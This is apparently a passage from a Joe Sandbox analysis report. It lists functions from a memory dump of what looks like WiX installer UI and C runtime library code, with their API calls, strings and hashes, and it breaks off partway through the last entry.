Function 6C9CE201 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C9DA138,00000008,6C9CE309,00000000,00000000,?,00000000,6C9CCE43,6C9CE0F0,?,?,6C9CBC56,?), ref: 6C9CE212
__lock.LIBCMT ref: 6C9CE246

Part of subcall function 6C9D10DD: __mtinitlocknum.LIBCMT ref: 6C9D10F3
Part of subcall function 6C9D10DD: __amsg_exit.LIBCMT ref: 6C9D10FF
Part of subcall function 6C9D10DD: EnterCriticalSection.KERNEL32(6C9CBC56,6C9CBC56,?,6C9CE24B,0000000D), ref: 6C9D1107

InterlockedIncrement.KERNEL32(00342DE8), ref: 6C9CE253
__lock.LIBCMT ref: 6C9CE267
___addlocaleref.LIBCMT ref: 6C9CE285

Strings

KERNEL32.DLL, xrefs: 6C9CE20D

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: db239e239a1773c3d302ccadb10dfaabafa77342f832cb3eb23636448c93a86d
Instruction ID: 338eb60d5e9a0c3706178d9e31f904fab52402a1ab15247e72fe4da70a8ed098
Opcode Fuzzy Hash: db239e239a1773c3d302ccadb10dfaabafa77342f832cb3eb23636448c93a86d
Instruction Fuzzy Hash: 30016172A04B41DFD7209F65C405749BBF0AF61328F20894DD496A6B90CB74F644CB52

Function 6C9C993C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 6C9C994B
InterlockedIncrement.KERNEL32(6C9DD11C), ref: 6C9C9968
CLSIDFromProgID.OLE32(Msxml2.DOMDocument,6C9DD10C,?,?,?,?,?,?,?,6C9C4057,?), ref: 6C9C9983
CLSIDFromProgID.OLE32(MSXML.DOMDocument,6C9DD10C,?,?,?,?,?,?,?,6C9C4057,?), ref: 6C9C998F

Strings

Msxml2.DOMDocument, xrefs: 6C9C997E
MSXML.DOMDocument, xrefs: 6C9C998A

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: d667607199be80d5300a2da69ab7fc3d96e373d010843da6bbce807eced04e79
Instruction ID: a0f7b7f3c8aa7076cf53c03893a5a319432f3c368260ae0c180143bc147d809b
Opcode Fuzzy Hash: d667607199be80d5300a2da69ab7fc3d96e373d010843da6bbce807eced04e79
Instruction Fuzzy Hash: F2F0E52230A97566D71017664D08F0F3E7DD7C3B9CF234455E949F5A04D220E4C18BB3

Function 6C9C4517 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,6C9CB171,?,?,00000000), ref: 6C9C4565
GetLastError.KERNEL32(?,?,?,6C9CB171,?,?,00000000,0000FDE9,?,?,?,00000000,00000000,0000003D,0000003D), ref: 6C9C456B

Part of subcall function 6C9CA699: GetProcessHeap.KERNEL32(00000000,?,?,6C9C4379,?,?,?,6C9CB353,?,00000000,00000000,00000044,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA6A1
Part of subcall function 6C9CA699: HeapSize.KERNEL32(00000000,?,6C9C4379,?,?,?,6C9CB353,?,00000000,00000000,00000044,?,?,6C9C15F0,WixBundleForcedRestartPackage,00000074), ref: 6C9CA6A8

Strings

W, xrefs: 6C9C4540
strutil.cpp, xrefs: 6C9C4641

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: W$strutil.cpp
API String ID: 3662877508-3697633219
Opcode ID: 7c68dfafcf2c8b1cfe3a3e0138efc81ca2fca7e618ffb14d9895e95126e98d52
Instruction ID: ef86cba8b7d004b5114c7608195f5a2f88696dd672e158992dc1a4b21a53477e
Opcode Fuzzy Hash: 7c68dfafcf2c8b1cfe3a3e0138efc81ca2fca7e618ffb14d9895e95126e98d52
Instruction Fuzzy Hash: 394181B170424AEFEB00CFA5CE84AAA77B8EF15314F204629E910EB690D775DA109F53

Function 6C9CF80A Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C9CF816

Part of subcall function 6C9CE32E: __getptd_noexit.LIBCMT ref: 6C9CE331
Part of subcall function 6C9CE32E: __amsg_exit.LIBCMT ref: 6C9CE33E

__amsg_exit.LIBCMT ref: 6C9CF836
__lock.LIBCMT ref: 6C9CF846
InterlockedDecrement.KERNEL32(?), ref: 6C9CF863
_free.LIBCMT ref: 6C9CF876
InterlockedIncrement.KERNEL32(03B31658), ref: 6C9CF88E

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: d5225fcfac372e28aaa272438b1ddc0022bacd8d72b5eba327ff7cf9c5c5f2ac
Instruction ID: a3410fd6f6b122f4182a89521dbdc8960050d21721e29418ae74c14fdbf64b28
Opcode Fuzzy Hash: d5225fcfac372e28aaa272438b1ddc0022bacd8d72b5eba327ff7cf9c5c5f2ac
Instruction Fuzzy Hash: A8018431B05A1197DB11AB658481B9D77B4AF1572CF214186E811B7E80C734F9C5CBD3

Function 6C9C6761 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 6C9C68D5

Part of subcall function 6C9CA652: GetProcessHeap.KERNEL32(?,?,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA663
Part of subcall function 6C9CA652: HeapAlloc.KERNEL32(00000000,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage,00000074), ref: 6C9CA66A

SysFreeString.OLEAUT32(?), ref: 6C9C6892

Strings

thmutil.cpp, xrefs: 6C9C67E9
Column|c, xrefs: 6C9C676F
Width, xrefs: 6C9C6830

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocProcess
String ID: Column|c$Width$thmutil.cpp
API String ID: 3351553325-763436584
Opcode ID: bc30c5792a11faea636da9441481e323f058fe2e96c2afa1d3267fb8da38b31b
Instruction ID: 9835c7cb2599fc3da8fb029870b34b5ca51559651a10268306a46f443d29fbf5
Opcode Fuzzy Hash: bc30c5792a11faea636da9441481e323f058fe2e96c2afa1d3267fb8da38b31b
Instruction Fuzzy Hash: 85417F71E01629BBEB119BA4CCC4AAEBBB8EF44758F1145A4E800FB650D731DE44CB92

Function 6C9C9649 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 6C9C9780

Part of subcall function 6C9CA652: GetProcessHeap.KERNEL32(?,?,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA663
Part of subcall function 6C9CA652: HeapAlloc.KERNEL32(00000000,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage,00000074), ref: 6C9CA66A

SysFreeString.OLEAUT32(00000000), ref: 6C9C9739

Strings

thmutil.cpp, xrefs: 6C9C96B8
Name, xrefs: 6C9C96F5
Page, xrefs: 6C9C9657

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocProcess
String ID: Name$Page$thmutil.cpp
API String ID: 3351553325-656149238
Opcode ID: 13e55fcec976b7f9b9c9da28c93f4f4104e6df36d423fb2f1755628997dd854a
Instruction ID: 734f49981c977e3905166f57c710210e1889e0747ddf7eb678f7651f9e085572
Opcode Fuzzy Hash: 13e55fcec976b7f9b9c9da28c93f4f4104e6df36d423fb2f1755628997dd854a
Instruction Fuzzy Hash: 64418076A01619EFCB01CFA4CC8499E7BB9EF84B58F2244A5E815E7600DB31DA51CB92

Function 6C9C5951 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6C9C9FA8: SysAllocString.OLEAUT32(?), ref: 6C9C9FBB
Part of subcall function 6C9C9FA8: VariantInit.OLEAUT32(?), ref: 6C9C9FC7
Part of subcall function 6C9C9FA8: VariantClear.OLEAUT32(?), ref: 6C9CA03B
Part of subcall function 6C9C9FA8: SysFreeString.OLEAUT32(00000000), ref: 6C9CA046

SysFreeString.OLEAUT32(00000001), ref: 6C9C599C
SysFreeString.OLEAUT32(00000000), ref: 6C9C5A39

Strings

Control, xrefs: 6C9C5964
Height, xrefs: 6C9C59F9
Width, xrefs: 6C9C59E0

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$Free$Variant$AllocClearInit
String ID: Control$Height$Width
API String ID: 3564436086-3248737062
Opcode ID: cd2aa394725bffe6b5ac235f34433fcfcd080a6b3f3f96822b4b48ba4f652be5
Instruction ID: 4f960888a40b4b7c13a008cc471962ee908b1abf46e54831cca5c68d839d1517
Opcode Fuzzy Hash: cd2aa394725bffe6b5ac235f34433fcfcd080a6b3f3f96822b4b48ba4f652be5
Instruction Fuzzy Hash: CA21E676600A08FFCB029F61CC8099E7BB9EF99264B624465F915A7710DB31DF00AB52

Function 6C9CA054 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 6C9CA06A
SysAllocString.OLEAUT32(?), ref: 6C9CA086
VariantClear.OLEAUT32(?), ref: 6C9CA10D
SysFreeString.OLEAUT32(00000000), ref: 6C9CA118

Strings

xmlutil.cpp, xrefs: 6C9CA09D

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: xmlutil.cpp
API String ID: 760788290-1270936966
Opcode ID: b7d6fb1e222672f508427aedca7b00ce8b595e8d9f087a00d3e908888492eb9e
Instruction ID: ca4d859be93580fe24886cc35c0a2a6cb81a5e6eb42723b2a43624e6d5897be8
Opcode Fuzzy Hash: b7d6fb1e222672f508427aedca7b00ce8b595e8d9f087a00d3e908888492eb9e
Instruction Fuzzy Hash: 36217F72B00619EFDB00DBE4C888AAE7B7DAF45399F114064E901EB640EB31DE40DB92

Function 6C9C7A84 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6C9C7A98
SendMessageW.USER32(?,00000402,?,00000000), ref: 6C9C7AF4
InvalidateRect.USER32(?,00000000,00000000,00000000,?,?,6C9C3505,?,00000411,?,?,00000412,?), ref: 6C9C7B03
GetLastError.KERNEL32(?,?,6C9C3505,?,00000411,?,?,00000412,?), ref: 6C9C7B0D

Strings

thmutil.cpp, xrefs: 6C9C7B32

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorInvalidateItemLastMessageRectSend
String ID: thmutil.cpp
API String ID: 3203272787-2961750086
Opcode ID: 2e393c07db53e369700c0b50d10e9593d7fe72e181d95680ec3d759b699e4806
Instruction ID: 1a6e6d3f4447bbe623c9a0bcc926a44c699718c9a648e0c4f4216662f831a236
Opcode Fuzzy Hash: 2e393c07db53e369700c0b50d10e9593d7fe72e181d95680ec3d759b699e4806
Instruction Fuzzy Hash: 592136B170115AAFDB004F66CC84D6A77BDEFA4358721813EF21ADA820D230C840DB23

Function 6C9C2298 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C9C22BD
SHBrowseForFolderW.SHELL32(?), ref: 6C9C230A
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 6C9C231E
CoTaskMemFree.OLE32(00000000), ref: 6C9C2340

Part of subcall function 6C9C62CE: GetDlgItem.USER32(?,00000024), ref: 6C9C62DD
Part of subcall function 6C9C62CE: SetWindowTextW.USER32(00000000,6C9DC028), ref: 6C9C62EB
Part of subcall function 6C9C62CE: GetLastError.KERNEL32(?,?,6C9C20B2,?,?,?,?,?,?,6C9DC000,?,00000009,?,?,?,6C9DC028), ref: 6C9C62F5

Strings

Q, xrefs: 6C9C2300

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: BrowseErrorFolderFreeFromItemLastListPathTaskTextWindow_memset
String ID: Q
API String ID: 540785508-3463352047
Opcode ID: d065290509b48d2c11d72214d0451fd4f29feea02116e6de772bcd715db5621d
Instruction ID: 8c61ef56d5a37a11fcf0b2be38830cb70b9317070ccf3b1c4ab6e3bbd8980a57
Opcode Fuzzy Hash: d065290509b48d2c11d72214d0451fd4f29feea02116e6de772bcd715db5621d
Instruction Fuzzy Hash: 95118FB5A01718AFDB20DF64DC48BEAB7F8EB49700F2041A6E915E2240DB30EA458F52

Function 6C9C81E3 Relevance: 7.6, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 6C9C820E
DeleteObject.GDI32(?), ref: 6C9C8220
DeleteObject.GDI32(?), ref: 6C9C8231
ImageList_Destroy.COMCTL32(?,00000000,00000000,00000000,?,6C9C98CE,00000000,?,?,6C9C9918,00000000,00000000,?,00000000,00000000,00000000), ref: 6C9C829A
DeleteObject.GDI32(?), ref: 6C9C82F2

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: DeleteObject$DestroyImageList_
String ID:
API String ID: 2242027670-0
Opcode ID: e8f728b1d1a6de2807e3ffb40e246ab8865344a1b12776c9982dea60481e51e0
Instruction ID: 6d236772e3c87f4a16ce2d651a5cdf45b1cfdd93b9367bc780abe527c88f282a
Opcode Fuzzy Hash: e8f728b1d1a6de2807e3ffb40e246ab8865344a1b12776c9982dea60481e51e0
Instruction Fuzzy Hash: 27416C71701B019BDB148F75C898A5BB7BCFF50689720892AE426D7E01C730F451CBAB

Function 6C9D25A8 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C9D25B6

Part of subcall function 6C9CE067: __FF_MSGBANNER.LIBCMT ref: 6C9CE080
Part of subcall function 6C9CE067: __NMSG_WRITE.LIBCMT ref: 6C9CE087
Part of subcall function 6C9CE067: HeapAlloc.KERNEL32(00000000,00000001,?,00000000,?,?,6C9CBC56,?), ref: 6C9CE0AC

_free.LIBCMT ref: 6C9D25C9

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 2941bf8f79a67a95fdc070ebdac0880f473fab692b0149dec00c552b2e5c6485
Instruction ID: c251b5471bcbd386c1a18a303bbed43210b65ec20cf8af5459528ff6de84b051
Opcode Fuzzy Hash: 2941bf8f79a67a95fdc070ebdac0880f473fab692b0149dec00c552b2e5c6485
Instruction Fuzzy Hash: 3911EE32648F14ABCF212F74980C6893BA9EF65374F658516F808B7B50DF30ED918792

Function 6C9C6D27 Relevance: 7.6, APIs: 5, Instructions: 59windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 6C9C6D66
SelectObject.GDI32(00000000,?), ref: 6C9C6D84
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 6C9C6DA6
SelectObject.GDI32(?,?), ref: 6C9C6DB2
DeleteDC.GDI32(?), ref: 6C9C6DB7

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateDeleteStretch
String ID:
API String ID: 732282326-0
Opcode ID: 92667cda2422b53826315980d0d03db3e94804a8d571414d9baddea5dd616a00
Instruction ID: 3ffe2f43f06bd0ed176f5c85cb0248276ac9615b9158bbc2b09e5acda31ddaf8
Opcode Fuzzy Hash: 92667cda2422b53826315980d0d03db3e94804a8d571414d9baddea5dd616a00
Instruction Fuzzy Hash: 7A2167B2A00609FFDB11CFA9CC44AAEBBF5FF48350F204159E509A2A60D730E950CF91

Function 6C9C6A60 Relevance: 7.6, APIs: 5, Instructions: 59windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 6C9C6AA3
SelectObject.GDI32(00000000,?), ref: 6C9C6ABE
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 6C9C6AE0
SelectObject.GDI32(?,?), ref: 6C9C6AEC
DeleteDC.GDI32(?), ref: 6C9C6AF1

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateDeleteStretch
String ID:
API String ID: 732282326-0
Opcode ID: 45bd2619feead4b4eaa5323293da29413f5dd2670f1d947d26941fe0477a0b0c
Instruction ID: 3db6166df3efb13024fc4c1e87f9328853238df4f8531bfaba7a3597457f856c
Opcode Fuzzy Hash: 45bd2619feead4b4eaa5323293da29413f5dd2670f1d947d26941fe0477a0b0c
Instruction Fuzzy Hash: 80219D76A00608EFCB11DF99C844AAEBBB5FF88304F208559E505A7220C731E951CF80

Function 6C9C6225 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 6C9C624C
SelectObject.GDI32(00000000,?), ref: 6C9C625F
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 6C9C6282
SelectObject.GDI32(?,?), ref: 6C9C628E
DeleteDC.GDI32(?), ref: 6C9C6293

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateDeleteStretch
String ID:
API String ID: 732282326-0
Opcode ID: 2938ad110bdba252cb3484bc7e5b87840c508fbbbe5aaaf3c411f4b505c2cd2c
Instruction ID: 370551d2bbc1ac099cab651e21d46ae7be79e9279af9918cb121361667a96383
Opcode Fuzzy Hash: 2938ad110bdba252cb3484bc7e5b87840c508fbbbe5aaaf3c411f4b505c2cd2c
Instruction Fuzzy Hash: 1D110975201604EFDF209F95CC44EAA7BB9FF49312B108529F64ADA920C371F890DF91

Function 6C9CFF8B Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C9CFF97

Part of subcall function 6C9CE32E: __getptd_noexit.LIBCMT ref: 6C9CE331
Part of subcall function 6C9CE32E: __amsg_exit.LIBCMT ref: 6C9CE33E

__getptd.LIBCMT ref: 6C9CFFAE
__amsg_exit.LIBCMT ref: 6C9CFFBC
__lock.LIBCMT ref: 6C9CFFCC
__updatetlocinfoEx_nolock.LIBCMT ref: 6C9CFFE0

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 764b902300f5aa4d6fb90c9c0787c812f3f110ebbf2299c529c5083e02fe19f6
Instruction ID: ee32ccbb918f3d85990b0bbea2db2dd8fa916e0b4279f7fae3c80a01b8c497c1
Opcode Fuzzy Hash: 764b902300f5aa4d6fb90c9c0787c812f3f110ebbf2299c529c5083e02fe19f6
Instruction Fuzzy Hash: 9FF09032B05B119BD721AB65940279D33A0AF2276CF21424AE02167FC1CB24EA58CA97

Function 6C9C7EF6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 6C9C804C

